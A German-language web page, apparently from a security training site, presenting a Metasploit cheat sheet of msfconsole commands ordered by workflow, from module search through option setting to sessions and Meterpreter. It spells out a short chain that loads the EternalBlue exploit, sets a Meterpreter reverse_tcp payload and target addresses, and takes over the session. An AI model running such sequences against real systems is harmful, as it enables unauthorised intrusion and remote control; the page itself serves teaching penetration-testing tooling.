Metasploit Cheatsheet: Die wichtigsten Befehle, Abläufe und Grundlagen kompakt erklärt

Ein gutes Metasploit Cheatsheet ist mehr als eine lose Sammlung von Befehlen. Gerade bei Metasploit reicht es nicht, Commands nur nebeneinander aufzulisten. Die Console arbeitet zustandsbasiert, Modulkontexte verändern die verfügbaren Aktionen, und viele Befehle entfalten ihren Wert erst dann, wenn klar ist, in welchem Schritt des Workflows sie eingesetzt werden. Genau deshalb sollte ein Cheatsheet nicht nur kurz, sondern auch logisch aufgebaut sein.

Diese Seite ist genau dafür gedacht: als kompakte, aber fachlich saubere Orientierung für die wichtigsten Metasploit-Befehle. Sie hilft beim schnellen Nachschlagen im Alltag, ohne dabei die innere Struktur des Frameworks zu verlieren. Du bekommst hier die wichtigsten Console-Kommandos, Befehle für Suche, Module, Optionen, Ausführung, Sessions und Meterpreter sowie Hinweise darauf, wann welcher Bereich typischerweise relevant wird.

Das Ziel ist nicht, jeden Spezialfall des Frameworks abzudecken, sondern die wichtigsten Handgriffe so zusammenzustellen, dass du in echten Workflows schneller sicher wirst. Genau dadurch wird ein Cheatsheet nützlich: nicht als Ersatz für Verständnis, sondern als kompakter Anker für bereits verstandene Abläufe.

Wenn du einzelne Bereiche danach ausführlicher vertiefen willst, passen Metasploit Tutorial, Metasploit Befehle, Metasploit Beispiele, Metasploit Workflow, Metasploit Exploits und Metasploit Meterpreter besonders gut dazu.

Der erste Bereich eines Metasploit-Cheatsheets betrifft immer die grundlegende Console-Arbeit. Diese Befehle bilden die Basis für alle späteren Schritte.

msfconsole
help
version
exit
quit

Kurz eingeordnet:

• msfconsole startet die zentrale Arbeitsumgebung
• help zeigt verfügbare Befehle oder Hilfeinfos
• version gibt die Metasploit-Version aus
• exit und quit beenden die Console

Gerade dieser erste Block wirkt simpel, ist aber im Alltag wichtig, weil hier der Einstieg in den Framework-Zustand beginnt. Wer sauber in der Console denkt, arbeitet später bei Modulen, Sessions und Payloads deutlich strukturierter.

Der nächste Kernbereich im Alltag ist die Modulsuche. Genau hier beginnt in der Praxis oft jeder echte Metasploit-Workflow.

search smb
search eternalblue
search type:exploit apache
search type:auxiliary ftp
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/smb/smb_version
back
info

Die wichtigsten Funktionen in Kurzform:

• search sucht nach Modulen anhand von Begriffen oder Typen
• use lädt das gewünschte Modul in den aktiven Arbeitskontext
• back verlässt den Modulkontext und kehrt zur globalen Console zurück
• info zeigt Details zum aktuell geladenen Modul

Dieser Abschnitt gehört in jedes Cheatsheet, weil Metasploit stark modulbasiert arbeitet. Ohne sichere Suche und sauberen Wechsel in den Modulkontext wird das Framework schnell unübersichtlich.

Mehr Tiefe dazu findest du auf Metasploit Befehle.

Sobald ein Modul geladen wurde, brauchst du fast immer die Übersicht über dessen Optionen und Möglichkeiten. Genau hier kommen die wichtigsten Anzeige-Befehle ins Spiel.

show options
show payloads
show targets
show advanced

Diese Commands helfen dir dabei, schnell zu sehen:

• welche Werte gesetzt werden müssen
• welche Payloads zu einem Exploit passen
• ob Zielvarianten vorhanden sind
• welche erweiterten Optionen verfügbar sind

Gerade im Cheatsheet-Kontext sind diese Befehle zentral, weil sie in fast jedem Modul vorkommen. Wer show options konsequent nutzt, vermeidet viele typische Fehlkonfigurationen.

Für Payload-Zusammenhänge hilft Metasploit Payloads weiter.

Fast jedes Metasploit-Modul braucht Zielparameter oder Kontextwerte. Deshalb gehört der Umgang mit set und verwandten Befehlen zu den absoluten Grundlagen.

set RHOSTS 192.168.1.10
set RPORT 445
set LHOST 192.168.1.20
set PAYLOAD windows/meterpreter/reverse_tcp
unset RHOSTS
setg LHOST 192.168.1.20
unsetg LHOST

Kurz erklärt:

• set setzt einen Wert im aktuell geladenen Modul
• unset entfernt einen gesetzten lokalen Wert
• setg setzt einen globalen Wert für mehrere Module
• unsetg löscht einen globalen Wert wieder

Gerade setg ist im Alltag praktisch, muss aber bewusst eingesetzt werden. Globale Werte sparen Zeit, können aber spätere Abläufe beeinflussen, wenn sie aus dem Blick geraten. Ein gutes Cheatsheet erinnert daher nicht nur an die Syntax, sondern auch an die Zustandslogik dahinter.

Sobald Modul und Optionen sauber vorbereitet sind, folgt die eigentliche Ausführung. In Metasploit sind dafür vor allem zwei Befehle zentral.

run
exploit

Für schnellere Varianten oder Hintergrundbetrieb kann man je nach Modulkontext zusätzlich sehen:

run -j
exploit -j

Wofür diese Befehle typischerweise stehen:

• run wird oft bei Auxiliary- und Scanner-Modulen genutzt
• exploit ist besonders typisch im Kontext klassischer Exploit-Module
• -j kann genutzt werden, um Jobs im Hintergrund laufen zu lassen

Auch in einem Cheatsheet bleibt wichtig: Die Ausführung ist nicht der erste, sondern der letzte Schritt eines vorbereiteten Modulzustands.

Für Exploit-Kontext und Zielstruktur helfen Metasploit Exploits und Metasploit Workflow weiter.

Sobald ein Modul zu einer Session oder einem Hintergrundprozess geführt hat, brauchst du schnelle Übersichtskommandos. Genau dafür gehören diese Befehle in jedes gute Cheatsheet.

sessions
sessions -i 1
sessions -k 1
jobs
jobs -k 1

Kurz erklärt:

• sessions listet aktive Sessions auf
• sessions -i 1 interagiert mit Session 1
• sessions -k 1 beendet Session 1
• jobs zeigt laufende Hintergrundjobs
• jobs -k 1 beendet Job 1

Gerade bei parallelen Targets oder mehreren laufenden Modulen ist dieser Bereich unverzichtbar. Ohne saubere Session- und Job-Verwaltung verliert man in Metasploit schnell die Übersicht.

Für interaktive Arbeit nach erfolgreicher Ausführung sind Metasploit Meterpreter und Post Exploitation die wichtigsten Anschlussseiten.

Wenn eine Meterpreter-Session aktiv ist, verschiebt sich die Arbeit in einen neuen Kontext. Auch hier helfen kompakte Grundbefehle enorm für die erste Orientierung.

sysinfo
getuid
pwd
ls
cd
ps
shell
background

Diese Kommandos gehören zu den häufigsten ersten Schritten:

• sysinfo zeigt Systeminformationen
• getuid zeigt den aktuellen Benutzerkontext
• pwd, ls und cd helfen bei der Navigation
• ps listet Prozesse auf
• shell wechselt in eine Shell-Interaktion
• background legt die aktuelle Session in den Hintergrund

Ein Cheatsheet sollte hier bewusst knapp bleiben, aber genau diese ersten Orientierungspunkte liefern. Sie reichen oft aus, um nach erfolgreicher Session-Übernahme die Richtung zu bestimmen.

Für tiefere Interaktion ist Metasploit Meterpreter die zentrale Vertiefung.

Neben Einzelbefehlen ist es im Alltag besonders hilfreich, ein paar kompakte Mini-Abläufe direkt greifbar zu haben. Genau solche Kombinationen machen ein Cheatsheet praktisch.

Suche und Auxiliary-Scan:

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.10
run

Exploit vorbereiten:

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
show payloads
set RHOSTS 192.168.1.10
set LHOST 192.168.1.20
exploit

Session übernehmen:

sessions
sessions -i 1

Genau solche Kurzketten sind im Alltag enorm nützlich, weil sie nicht nur einen Befehl, sondern einen typischen Mikro-Workflow abbilden. Dadurch wird das Cheatsheet deutlich praxistauglicher.

Für größere Ablaufketten hilft Metasploit Beispiele direkt weiter.

Ein Cheatsheet ist ein starkes Werkzeug, kann aber auch falsch genutzt werden. Gerade in Metasploit entstehen Probleme häufig dann, wenn ein kompakter Spickzettel als vollständiger Ersatz für Modulverständnis oder Workflow-Denken missverstanden wird.

• Befehle werden kopiert, ohne den aktiven Modulkontext zu beachten
• show options wird übersprungen
• globale Werte aus setg wirken weiter, ohne bemerkt zu werden
• Sessions oder Jobs werden erzeugt, aber nicht sauber verwaltet
• Cheatsheet-Kommandos werden als starre Abfolge statt als flexible Orientierung gelesen

Genau deshalb ist ein gutes Cheatsheet keine Abkürzung um Verständnis herum, sondern eine Verdichtung bereits verstandener Arbeitslogik. Es soll Orientierung schaffen, nicht Denken ersetzen.

Wenn du typische Stolperstellen im Ablauf besser verstehen willst, helfen Metasploit Befehle und Metasploit Workflow besonders gut weiter.

Der eigentliche Wert eines starken Metasploit Cheatsheets liegt darin, dass es das Framework auf seine wichtigsten Übergänge reduziert. Genau darin unterscheidet sich ein gutes Cheatsheet von einer beliebigen Command-Liste. Es zeigt nicht nur, welche Syntax existiert, sondern welche Zustände im Alltag immer wiederkehren: Console starten, Modul finden, Modul laden, Optionen lesen, Werte setzen, ausführen, Sessions übernehmen.

Gerade weil Metasploit so modular und zustandsbasiert arbeitet, ist diese Verdichtung enorm hilfreich. Ein gutes Cheatsheet macht aus der Komplexität des Frameworks eine kompakte Landkarte. Wer diese Landkarte lesen kann, findet sich im Alltag viel schneller zurecht und kann auch neue Module oder Kontexte besser einordnen.

Genau deshalb sollte ein Cheatsheet nie nur kurz sein, sondern klar strukturiert. Erst die Struktur macht die Kürze wirklich nützlich. Nicht die längste Befehlsliste bringt den größten Mehrwert, sondern die beste Verdichtung der tatsächlichen Arbeitslogik.

Wenn du diesen Blick weiter vertiefen willst, helfen Wie funktioniert Metasploit, Metasploit Befehle, Metasploit Beispiele und Metasploit Workflow besonders gut weiter.

Ein gutes Metasploit Cheatsheet hilft dann am meisten, wenn es die wichtigsten Commands nicht nur kompakt, sondern in ihrer tatsächlichen Arbeitsreihenfolge zeigt. Von msfconsole über search, use, show options, set, run und exploit bis hin zu sessions und Meterpreter-Kommandos bildet es die Kernlogik des Frameworks in verdichteter Form ab.

Genau darin liegt der Mehrwert: Du bekommst schnelle Orientierung im Alltag, ohne dass die innere Struktur von Metasploit verloren geht. Das Cheatsheet ersetzt kein Verständnis, aber es beschleunigt sicheres Arbeiten enorm, sobald die Grundlagen sitzen.

Nicht die größte Menge an Kommandos macht ein Cheatsheet stark, sondern die Fähigkeit, die entscheidenden Handgriffe klar, schnell und praxisnah verfügbar zu machen. Genau dort entsteht echter Nutzen.

Wenn du an den wichtigsten Vertiefungen weiterarbeiten willst, führen Metasploit Tutorial, Metasploit Befehle, Metasploit Beispiele, Metasploit Workflow, Metasploit Meterpreter und Metasploit Exploits direkt in die wichtigsten nächsten Themen.

Passende Vertiefungen: Metasploit Workflow und Metasploit Beispiele.

Nach erfolgreicher Ausführung eines Moduls kann eine Session entstehen. Genau hier wird Metasploit zu einer durchgängigen Arbeitsumgebung und nicht nur zu einem Framework für den Start eines Moduls. Deshalb gehören Session-Befehle unbedingt in ein gutes Cheatsheet.

 sessions sessions -i 1 sessions -k 1 

Mit sessions listest du aktive Sessions auf. sessions -i 1 verbindet dich mit der Session-ID 1. sessions -k 1 beendet die entsprechende Session wieder. Diese Commands sind besonders wichtig, weil sie zeigen, dass der Workflow nicht mit exploit endet. Danach beginnt oft erst die eigentliche Analyse oder Nachbearbeitung.

Gerade für Anfänger ist das ein wertvoller Punkt. Viele denken bei Metasploit vor allem an den Moment der Ausführung. Ein Cheatsheet erinnert daran, dass Sessions ein eigener, wichtiger Arbeitsbereich sind. Du verwaltest damit Ergebnisse, Zugriffspfade und Interaktion nach erfolgreichem Ablauf.

Falls eine Meterpreter-Session vorliegt, kommen anschließend weitere spezielle Befehle hinzu. Genau deshalb ist es sinnvoll, Sessions als eigene Ebene im Framework zu begreifen.

Mehr dazu findest du auf: Metasploit Post Exploitation und Metasploit Meterpreter.

Ein starkes Cheatsheet sollte nicht nur einzelne Commands listen, sondern auch einen kompakten Mini-Workflow zeigen. Genau so wird sichtbar, wie die Befehle im realen Ablauf zusammenhängen.

 msfconsole search smb use exploit/windows/smb/example_module info show options show payloads set RHOSTS 192.168.1.10 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.20 check exploit sessions 

Dieser Ablauf ist bewusst vereinfacht, aber didaktisch sehr stark. Er zeigt die Grundlogik von Metasploit: starten, suchen, laden, lesen, konfigurieren, prüfen, ausführen, auswerten. Genau diese Reihenfolge taucht im Framework immer wieder auf. Wer sie verinnerlicht, wird mit Metasploit deutlich schneller sicher.

Besonders wichtig ist dabei, dass jeder Schritt einen Sinn hat. search dient der Modulauswahl, info der Einordnung, show options der Konfiguration, show payloads der Kompatibilitätsprüfung, check der vorsichtigen Validierung und sessions der Nachbearbeitung.

Ein Cheatsheet sollte genau diese Struktur transportieren. Es geht nicht nur darum, schnell etwas nachzuschlagen, sondern die Logik des Frameworks im Kopf zu stabilisieren. Genau dann wird aus einer Befehlsübersicht ein echtes Arbeitswerkzeug.

Passende Ergänzungen: Metasploit Tutorial und Metasploit Beispiele.

Ein Cheatsheet ist hilfreich, kann aber auch falsch verwendet werden. Genau deshalb ist es wichtig, typische Fehler zu kennen. Der häufigste Fehler ist, Commands nur abzuschreiben, ohne ihre Funktion zu verstehen. Dann wird aus einer Hilfe schnell eine Krücke, die nur solange funktioniert, wie die Umgebung exakt gleich bleibt.

• Cheatsheet mit vollständigem Verständnis verwechselt: Die Übersicht hilft, ersetzt aber keine Modul-Einordnung.
• show options übersprungen: Pflichtparameter fehlen, obwohl die Befehlsfolge bekannt ist.
• Payload blind gewählt: Die Kompatibilität oder Netzwerklage wird nicht bedacht.
• info nicht gelesen: Das Modul wird eingesetzt, ohne seine Grenzen oder Voraussetzungen zu verstehen.
• Fehlermeldungen falsch interpretiert: Statt die Konfiguration zu prüfen, wird das Tool selbst verantwortlich gemacht.

Gerade Anfänger sollten deshalb ein Cheatsheet als Orientierung verstehen, nicht als vollständige Anleitung. Es zeigt dir die Struktur, aber du musst trotzdem lesen, prüfen und denken. Genau diese Kombination macht den Umgang mit Metasploit langfristig erfolgreich.

In diesem Sinn ist ein gutes Cheatsheet nicht der Endpunkt des Lernens, sondern ein Begleiter im Lernprozess. Es hilft dir, Routinen schneller aufzubauen und wiederkehrende Schritte sicherer zu beherrschen.

Wenn du typische Stolperfallen vermeiden willst, helfen dir auch: Metasploit für Anfänger und Metasploit Installation.

Passende Vertiefungen, Praxisseiten und angrenzende Themen:

Passender Lernpfad:

Passende Erweiterungen:

Passende Lernbundels:

Passende Zertifikate: